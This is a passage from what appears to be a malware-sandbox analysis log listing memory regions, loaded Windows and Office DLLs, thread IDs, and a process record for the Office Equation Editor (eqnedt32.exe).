region_type = mapped_file
name = "dnsapi.dll"
filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")
Region:
id = 661
start_va = 0x44a0000
end_va = 0x451ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000044a0000"
filename = ""
Region:
id = 662
start_va = 0x7fef4d40000
end_va = 0x7fef4d5bfff
entry_point = 0x7fef4d40000
region_type = mapped_file
name = "rasman.dll"
filename = "\\Windows\\System32\\rasman.dll" (normalized: "c:\\windows\\system32\\rasman.dll")
Region:
id = 663
start_va = 0x7fef4d60000
end_va = 0x7fef4dc1fff
entry_point = 0x7fef4d60000
region_type = mapped_file
name = "rasapi32.dll"
filename = "\\Windows\\System32\\rasapi32.dll" (normalized: "c:\\windows\\system32\\rasapi32.dll")
Region:
id = 664
start_va = 0x7fef6570000
end_va = 0x7fef6580fff
entry_point = 0x7fef6570000
region_type = mapped_file
name = "rtutils.dll"
filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll")
Region:
id = 665
start_va = 0x7fee3da0000
end_va = 0x7fee46dcfff
entry_point = 0x7fee3da0000
region_type = mapped_file
name = "csi.dll"
filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Csi.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\csi.dll")
Region:
id = 666
start_va = 0x7fefc510000
end_va = 0x7fefc63bfff
entry_point = 0x7fefc510000
region_type = mapped_file
name = "propsys.dll"
filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")
Region:
id = 667
start_va = 0x28e0000
end_va = 0x28e0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000028e0000"
filename = ""
Region:
id = 668
start_va = 0x43e0000
end_va = 0x449ffff
entry_point = 0x43e0000
region_type = mapped_file
name = "kernelbase.dll.mui"
filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui")
Region:
id = 669
start_va = 0x7fefd5f0000
end_va = 0x7fefd611fff
entry_point = 0x7fefd5f0000
region_type = mapped_file
name = "bcrypt.dll"
filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")
Region:
id = 670
start_va = 0x7fefd0c0000
end_va = 0x7fefd10bfff
entry_point = 0x7fefd0c0000
region_type = mapped_file
name = "bcryptprimitives.dll"
filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")
Region:
id = 671
start_va = 0x28f0000
end_va = 0x28fffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000028f0000"
filename = ""
Region:
id = 672
start_va = 0x2a00000
end_va = 0x2a0ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002a00000"
filename = ""
Region:
id = 673
start_va = 0x4660000
end_va = 0x475ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000004660000"
filename = ""
Region:
id = 674
start_va = 0x5810000
end_va = 0x590ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000005810000"
filename = ""
Region:
id = 675
start_va = 0x7fefd080000
end_va = 0x7fefd089fff
entry_point = 0x7fefd080000
region_type = mapped_file
name = "credssp.dll"
filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll")
Region:
id = 676
start_va = 0x59d0000
end_va = 0x5acffff
entry_point = 0x0
region_type = private
name = "private_0x00000000059d0000"
filename = ""
Region:
id = 677
start_va = 0x7fef3020000
end_va = 0x7fef308bfff
entry_point = 0x7fef3020000
region_type = mapped_file
name = "aceoledb.dll"
filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\ACEOLEDB.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\aceoledb.dll")
Region:
id = 678
start_va = 0x7fef93b0000
end_va = 0x7fef93b8fff
entry_point = 0x7fef93b0000
region_type = mapped_file
name = "sensapi.dll"
filename = "\\Windows\\System32\\SensApi.dll" (normalized: "c:\\windows\\system32\\sensapi.dll")
Region:
id = 679
start_va = 0x7fffff98000
end_va = 0x7fffff99fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff98000"
filename = ""
Region:
id = 680
start_va = 0x2a10000
end_va = 0x2a11fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002a10000"
filename = ""
Region:
id = 681
start_va = 0x2a20000
end_va = 0x2a2ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002a20000"
filename = ""
Region:
id = 682
start_va = 0x2a40000
end_va = 0x2a4ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002a40000"
filename = ""
Region:
id = 683
start_va = 0x5160000
end_va = 0x51dffff
entry_point = 0x0
region_type = private
name = "private_0x0000000005160000"
filename = ""
Region:
id = 684
start_va = 0x5b90000
end_va = 0x5c8ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000005b90000"
filename = ""
Region:
id = 685
start_va = 0x5c90000
end_va = 0x608ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000005c90000"
filename = ""
Region:
id = 686
start_va = 0x6160000
end_va = 0xa15ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000006160000"
filename = ""
Region:
id = 687
start_va = 0xa1c0000
end_va = 0xa2bffff
entry_point = 0x0
region_type = private
name = "private_0x000000000a1c0000"
filename = ""
Region:
id = 688
start_va = 0xa320000
end_va = 0xa41ffff
entry_point = 0x0
region_type = private
name = "private_0x000000000a320000"
filename = ""
Region:
id = 689
start_va = 0xa4e0000
end_va = 0xa5dffff
entry_point = 0x0
region_type = private
name = "private_0x000000000a4e0000"
filename = ""
Region:
id = 690
start_va = 0x75830000
end_va = 0x75843fff
entry_point = 0x75830000
region_type = mapped_file
name = "oledb32r.dll"
filename = "\\Program Files\\Common Files\\System\\Ole DB\\oledb32r.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\oledb32r.dll")
Region:
id = 691
start_va = 0x7fee3880000
end_va = 0x7fee3959fff
entry_point = 0x7fee3880000
region_type = mapped_file
name = "acees.dll"
filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\ACEES.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\acees.dll")
Region:
id = 692
start_va = 0x7fee3960000
end_va = 0x7fee3a38fff
entry_point = 0x7fee3960000
region_type = mapped_file
name = "acewstr.dll"
filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\1033\\ACEWSTR.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\1033\\acewstr.dll")
Region:
id = 693
start_va = 0x7fee3a40000
end_va = 0x7fee3c86fff
entry_point = 0x7fee3a40000
region_type = mapped_file
name = "acecore.dll"
filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\ACECORE.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\acecore.dll")
Region:
id = 694
start_va = 0x7fee3c90000
end_va = 0x7fee3d9dfff
entry_point = 0x7fee3c90000
region_type = mapped_file
name = "oledb32.dll"
filename = "\\Program Files\\Common Files\\System\\Ole DB\\oledb32.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\oledb32.dll")
Region:
id = 695
start_va = 0x7fef92f0000
end_va = 0x7fef9317fff
entry_point = 0x7fef92f0000
region_type = mapped_file
name = "msdart.dll"
filename = "\\Windows\\System32\\msdart.dll" (normalized: "c:\\windows\\system32\\msdart.dll")
Region:
id = 696
start_va = 0x7fefbc10000
end_va = 0x7fefbc17fff
entry_point = 0x7fefbc10000
region_type = mapped_file
name = "rasadhlp.dll"
filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll")
Region:
id = 697
start_va = 0x7fffff90000
end_va = 0x7fffff91fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff90000"
filename = ""
Region:
id = 698
start_va = 0x7fffff92000
end_va = 0x7fffff93fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff92000"
filename = ""
Region:
id = 699
start_va = 0x7fffff94000
end_va = 0x7fffff95fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff94000"
filename = ""
Region:
id = 700
start_va = 0x7fffff96000
end_va = 0x7fffff97fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff96000"
filename = ""
Region:
id = 701
start_va = 0x2a30000
end_va = 0x2a39fff
entry_point = 0x2a30000
region_type = mapped_file
name = "normnfd.nls"
filename = "\\Windows\\System32\\normnfd.nls" (normalized: "c:\\windows\\system32\\normnfd.nls")
Region:
id = 702
start_va = 0x2a50000
end_va = 0x2a5ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002a50000"
filename = ""
Region:
id = 703
start_va = 0x2c80000
end_va = 0x2c8ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002c80000"
filename = ""
Region:
id = 704
start_va = 0xa6b0000
end_va = 0xa6bffff
entry_point = 0x0
region_type = private
name = "private_0x000000000a6b0000"
filename = ""
Region:
id = 705
start_va = 0xa6c0000
end_va = 0xa7bffff
entry_point = 0x0
region_type = private
name = "private_0x000000000a6c0000"
filename = ""
Region:
id = 706
start_va = 0xa7c0000
end_va = 0xa8bffff
entry_point = 0x0
region_type = private
name = "private_0x000000000a7c0000"
filename = ""
Region:
id = 707
start_va = 0xb0c0000
end_va = 0xb3bffff
entry_point = 0x0
region_type = private
name = "private_0x000000000b0c0000"
filename = ""
Region:
id = 708
start_va = 0xcbc0000
end_va = 0xcebffff
entry_point = 0x0
region_type = private
name = "private_0x000000000cbc0000"
filename = ""
Region:
id = 709
start_va = 0x75750000
end_va = 0x75821fff
entry_point = 0x75750000
region_type = mapped_file
name = "msvcr100.dll"
filename = "\\Program Files\\Microsoft Office\\root\\VFS\\System\\msvcr100.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\system\\msvcr100.dll")
Region:
id = 710
start_va = 0x7fef2fa0000
end_va = 0x7fef3019fff
entry_point = 0x7fef2fa0000
region_type = mapped_file
name = "expsrv.dll"
filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\EXPSRV.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\expsrv.dll")
Region:
id = 711
start_va = 0x7fef8ab0000
end_va = 0x7fef8ac4fff
entry_point = 0x7fef8ab0000
region_type = mapped_file
name = "napinsp.dll"
filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll")
Region:
id = 712
start_va = 0x7fef9350000
end_va = 0x7fef9357fff
entry_point = 0x7fef9350000
region_type = mapped_file
name = "vbajet32.dll"
filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\VBAJET32.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\vbajet32.dll")
Region:
id = 713
start_va = 0x7fffff8e000
end_va = 0x7fffff8ffff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff8e000"
filename = ""
Region:
id = 714
start_va = 0x7fef8a90000
end_va = 0x7fef8aa8fff
entry_point = 0x7fef8a90000
region_type = mapped_file
name = "pnrpnsp.dll"
filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll")
Region:
id = 715
start_va = 0x7fefd420000
end_va = 0x7fefd474fff
entry_point = 0x7fefd420000
region_type = mapped_file
name = "mswsock.dll"
filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll")
Region:
id = 716
start_va = 0x7fefb590000
end_va = 0x7fefb59afff
entry_point = 0x7fefb590000
region_type = mapped_file
name = "winrnr.dll"
filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll")
Region:
id = 717
start_va = 0x7fefce20000
end_va = 0x7fefce26fff
entry_point = 0x7fefce20000
region_type = mapped_file
name = "wshtcpip.dll"
filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll")
Region:
id = 718
start_va = 0x7fefd410000
end_va = 0x7fefd416fff
entry_point = 0x7fefd410000
region_type = mapped_file
name = "wship6.dll"
filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll")
Region:
id = 719
start_va = 0x7fef96b0000
end_va = 0x7fef9702fff
entry_point = 0x7fef96b0000
region_type = mapped_file
name = "fwpuclnt.dll"
filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll")
Region:
id = 720
start_va = 0x2c70000
end_va = 0x2c7ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002c70000"
filename = ""
Region:
id = 721
start_va = 0xa980000
end_va = 0xaa7ffff
entry_point = 0x0
region_type = private
name = "private_0x000000000a980000"
filename = ""
Region:
id = 722
start_va = 0xaa90000
end_va = 0xab0ffff
entry_point = 0x0
region_type = private
name = "private_0x000000000aa90000"
filename = ""
Region:
id = 723
start_va = 0xab30000
end_va = 0xac2ffff
entry_point = 0x0
region_type = private
name = "private_0x000000000ab30000"
filename = ""
Region:
id = 724
start_va = 0xadf0000
end_va = 0xaeeffff
entry_point = 0x0
region_type = private
name = "private_0x000000000adf0000"
filename = ""
Region:
id = 725
start_va = 0xaf20000
end_va = 0xb01ffff
entry_point = 0x0
region_type = private
name = "private_0x000000000af20000"
filename = ""
Region:
id = 726
start_va = 0x7fef2ca0000
end_va = 0x7fef2d0dfff
entry_point = 0x7fef2ca0000
region_type = mapped_file
name = "csiresources.dll"
filename = "\\Program Files\\Microsoft Office\\root\\Office16\\CSIRESOURCES.DLL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\csiresources.dll")
Region:
id = 727
start_va = 0x7fefdce0000
end_va = 0x7fefdd15fff
entry_point = 0x7fefdce0000
region_type = mapped_file
name = "cfgmgr32.dll"
filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")
Region:
id = 728
start_va = 0x7fffff86000
end_va = 0x7fffff87fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff86000"
filename = ""
Region:
id = 729
start_va = 0x7fffff88000
end_va = 0x7fffff89fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff88000"
filename = ""
Region:
id = 730
start_va = 0x7fffff8a000
end_va = 0x7fffff8bfff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff8a000"
filename = ""
Region:
id = 731
start_va = 0x7fffff8c000
end_va = 0x7fffff8dfff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff8c000"
filename = ""
Region:
id = 755
start_va = 0x2a20000
end_va = 0x2a21fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002a20000"
filename = ""
Region:
id = 756
start_va = 0x2ca0000
end_va = 0x2caffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002ca0000"
filename = ""
Region:
id = 757
start_va = 0xacd0000
end_va = 0xadcffff
entry_point = 0x0
region_type = private
name = "private_0x000000000acd0000"
filename = ""
Region:
id = 758
start_va = 0xb050000
end_va = 0xb14ffff
entry_point = 0x0
region_type = private
name = "private_0x000000000b050000"
filename = ""
Region:
id = 759
start_va = 0xb250000
end_va = 0xb34ffff
entry_point = 0x0
region_type = private
name = "private_0x000000000b250000"
filename = ""
Region:
id = 760
start_va = 0xb4a0000
end_va = 0xb59ffff
entry_point = 0x0
region_type = private
name = "private_0x000000000b4a0000"
filename = ""
Region:
id = 761
start_va = 0x7fefcf10000
end_va = 0x7fefcf2afff
entry_point = 0x7fefcf10000
region_type = mapped_file
name = "gpapi.dll"
filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll")
Region:
id = 762
start_va = 0x7fefd210000
end_va = 0x7fefd266fff
entry_point = 0x7fefd210000
region_type = mapped_file
name = "schannel.dll"
filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll")
Region:
id = 763
start_va = 0x7fefd620000
end_va = 0x7fefd66dfff
entry_point = 0x7fefd620000
region_type = mapped_file
name = "ncrypt.dll"
filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll")
Region:
id = 764
start_va = 0x7fffff7e000
end_va = 0x7fffff7ffff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff7e000"
filename = ""
Region:
id = 765
start_va = 0x7fffff80000
end_va = 0x7fffff81fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff80000"
filename = ""
Region:
id = 766
start_va = 0x7fffff82000
end_va = 0x7fffff83fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff82000"
filename = ""
Region:
id = 767
start_va = 0x7fffff84000
end_va = 0x7fffff85fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff84000"
filename = ""
Region:
id = 2756
start_va = 0xb150000
end_va = 0xb24ffff
entry_point = 0x0
region_type = private
name = "private_0x000000000b150000"
filename = ""
Region:
id = 2757
start_va = 0xb350000
end_va = 0xb44ffff
entry_point = 0x0
region_type = private
name = "private_0x000000000b350000"
filename = ""
Region:
id = 2758
start_va = 0xb750000
end_va = 0xbf4ffff
entry_point = 0x0
region_type = private
name = "private_0x000000000b750000"
filename = ""
Region:
id = 2759
start_va = 0x7fee3760000
end_va = 0x7fee387efff
entry_point = 0x7fee3760000
region_type = mapped_file
name = "webservices.dll"
filename = "\\Windows\\System32\\webservices.dll" (normalized: "c:\\windows\\system32\\webservices.dll")
Region:
id = 2760
start_va = 0x7fefc040000
end_va = 0x7fefc074fff
entry_point = 0x7fefc040000
region_type = mapped_file
name = "xmllite.dll"
filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll")
Region:
id = 2761
start_va = 0x7fefcb80000
end_va = 0x7fefcbabfff
entry_point = 0x7fefcb80000
region_type = mapped_file
name = "powrprof.dll"
filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")
Region:
id = 2762
start_va = 0x7fefddd0000
end_va = 0x7fefdde9fff
entry_point = 0x7fefddd0000
region_type = mapped_file
name = "devobj.dll"
filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll")
Region:
id = 2763
start_va = 0x7feff2f0000
end_va = 0x7feff4c6fff
entry_point = 0x7feff2f0000
region_type = mapped_file
name = "setupapi.dll"
filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll")
Thread:
id = 31
os_tid = 0x9e8
Thread:
id = 32
os_tid = 0x9f0
Thread:
id = 34
os_tid = 0xa74
Thread:
id = 35
os_tid = 0xa78
Thread:
id = 36
os_tid = 0xa7c
Thread:
id = 37
os_tid = 0xa80
Thread:
id = 38
os_tid = 0xa84
Thread:
id = 39
os_tid = 0xa8c
Thread:
id = 40
os_tid = 0xa90
Thread:
id = 41
os_tid = 0xa94
Thread:
id = 42
os_tid = 0xa98
Thread:
id = 43
os_tid = 0xa9c
Thread:
id = 44
os_tid = 0xaa0
Thread:
id = 45
os_tid = 0xaa4
Thread:
id = 46
os_tid = 0xaa8
Thread:
id = 47
os_tid = 0xab0
Thread:
id = 48
os_tid = 0xab8
Thread:
id = 49
os_tid = 0xabc
Thread:
id = 50
os_tid = 0xac0
Thread:
id = 51
os_tid = 0xac4
Thread:
id = 52
os_tid = 0xac8
Thread:
id = 53
os_tid = 0xacc
Thread:
id = 54
os_tid = 0xad0
Thread:
id = 55
os_tid = 0xad4
Thread:
id = 56
os_tid = 0xadc
Thread:
id = 57
os_tid = 0xae0
Thread:
id = 58
os_tid = 0xae4
Thread:
id = 59
os_tid = 0xaec
Thread:
id = 60
os_tid = 0xb00
Thread:
id = 64
os_tid = 0xb30
Thread:
id = 65
os_tid = 0xb34
Process:
id = "3"
image_name = "eqnedt32.exe"
filename = "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\equation\\eqnedt32.exe"
page_root = "0x2ebed000"
os_pid = "0xbd4"
os_integrity_level = "0x2000"
os_privileges = "0x800000"
monitor_reason = "rpc_server"
parent_id = "1"
os_parent_pid = "0x8ec"
cmd_line = "\"C:\\Program Files\\Microsoft Office\\Root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE\" -Embedding"
cur_dir = "C:\\Windows\\system32\\"
os_username = "YKYD69Q\\aETAdzjz"
os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e662" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 804
start_va = 0x10000
end_va = 0x2ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 805
start_va = 0x30000
end_va = 0x31fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000030000"
filename = ""
Region:
id = 806
start_va = 0x40000
end_va = 0x40fff
entry_point = 0x40000
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 807
start_va = 0x50000
end_va = 0x8ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000050000"
filename = ""
Region:
id = 808
start_va = 0x90000
end_va = 0x18ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000090000"
filename = ""
Region:
id = 809
start_va = 0x190000
end_va = 0x193fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000190000"
filename = ""
Region:
id = 810
start_va = 0x400000
end_va = 0x48dfff
entry_point = 0x400000
region_type = mapped_file
name = "eqnedt32.exe"
filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\equation\\eqnedt32.exe")
Region:
id = 811
start_va = 0x77c40000
end_va = 0x77de8fff
entry_point = 0x77c40000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 812
start_va = 0x77e20000
end_va = 0x77f9ffff
entry_point = 0x77e20000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")
Region:
id = 813
start_va = 0x7efb0000
end_va = 0x7efd2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efb0000"
filename = ""
Region:
id = 814
start_va = 0x7efdb000
end_va = 0x7efddfff
entry_point = 0x0
region_type = private
name = "private_0x000000007efdb000"
filename = ""
Region:
id = 815
start_va = 0x7efde000
end_va = 0x7efdefff
entry_point = 0x0
region_type = private
name = "private_0x000000007efde000"
filename = ""
Region:
id = 816
start_va = 0x7efdf000
end_va = 0x7efdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007efdf000"
filename = ""
Region:
id = 817
start_va = 0x7efe0000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007efe0000"
filename = ""
Region:
id = 818
start_va = 0x7ffe0000
end_va = 0x7ffeffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 819
start_va = 0x7fff0000
end_va = 0x7fffffeffff
entry_point = 0x0
region_type = private
name = "private_0x000000007fff0000"
filename = ""
Region:
id = 820
start_va = 0x1a0000
end_va = 0x1a0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001a0000"
filename = ""
Region:
id = 821
start_va = 0x1c0000
end_va = 0x23ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000001c0000"
filename = ""
Region:
id = 822
start_va = 0x752a0000
end_va = 0x752a7fff
entry_point = 0x752a0000
region_type = mapped_file
name = "wow64cpu.dll"
filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")
Region:
id = 823
start_va = 0x752b0000
end_va = 0x7530bfff
entry_point = 0x752b0000
region_type = mapped_file
name = "wow64win.dll"
filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")
Region:
id = 824
start_va = 0x75310000
end_va = 0x7534efff
entry_point = 0x75310000
region_type = mapped_file
name = "wow64.dll"
filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")
Region:
id = 825
start_va = 0x250000
end_va = 0x34ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000250000"
filename = ""
Region:
id = 826
start_va = 0x75f40000
end_va = 0x75f85fff
entry_point = 0x75f40000
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")
Region:
id = 827
start_va = 0x76220000
end_va = 0x7632ffff
entry_point = 0x76220000
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")
Region:
id = 828
start_va = 0x77a20000
end_va = 0x77b19fff
entry_point = 0x0
region_type = private
name = "private_0x0000000077a20000"
filename = ""
Region:
id = 829
start_va = 0x77b20000
end_va = 0x77c3efff
entry_point = 0x0
region_type = private
name = "private_0x0000000077b20000"
filename = ""
Region:
id = 830
start_va = 0x10000
end_va = 0x1ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 831
start_va = 0x20000
end_va = 0x20fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 832
start_va = 0x350000
end_va = 0x3b6fff
entry_point = 0x350000
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 833
start_va = 0x75100000
end_va = 0x75183fff
entry_point = 0x75100000
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll")
Region:
id = 834
start_va = 0x75190000
end_va = 0x751a6fff
entry_point = 0x75190000
region_type = mapped_file
name = "userenv.dll"
filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll")
Region:
id = 835
start_va = 0x75360000
end_va = 0x754d8fff
entry_point = 0x75360000
region_type = mapped_file
name = "c2r32.dll"
filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\C2R32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r32.dll")
Region:
id = 836
start_va = 0x754e0000
end_va = 0x75697fff
entry_point = 0x754e0000
region_type = mapped_file
name = "appvisvsubsystems32.dll"
filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\AppvIsvSubsystems32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems32.dll")
Region:
id = 837
start_va = 0x75950000
end_va = 0x7595afff
entry_point = 0x75950000
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll")
Region:
id = 838
start_va = 0x75970000
end_va = 0x7597bfff
entry_point = 0x75970000
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")
Region:
id = 839
start_va = 0x75980000
end_va = 0x759dffff
entry_point = 0x75980000
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")
Region:
id = 840
start_va = 0x759e0000
end_va = 0x759f8fff
entry_point = 0x759e0000
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")
Region:
id = 841
start_va = 0x75a10000
end_va = 0x75abbfff
entry_point = 0x75a10000
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")
Region:
id = 842
start_va = 0x75c60000
end_va = 0x75cb6fff
entry_point = 0x75c60000
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")
Region:
id = 843
start_va = 0x75cf0000
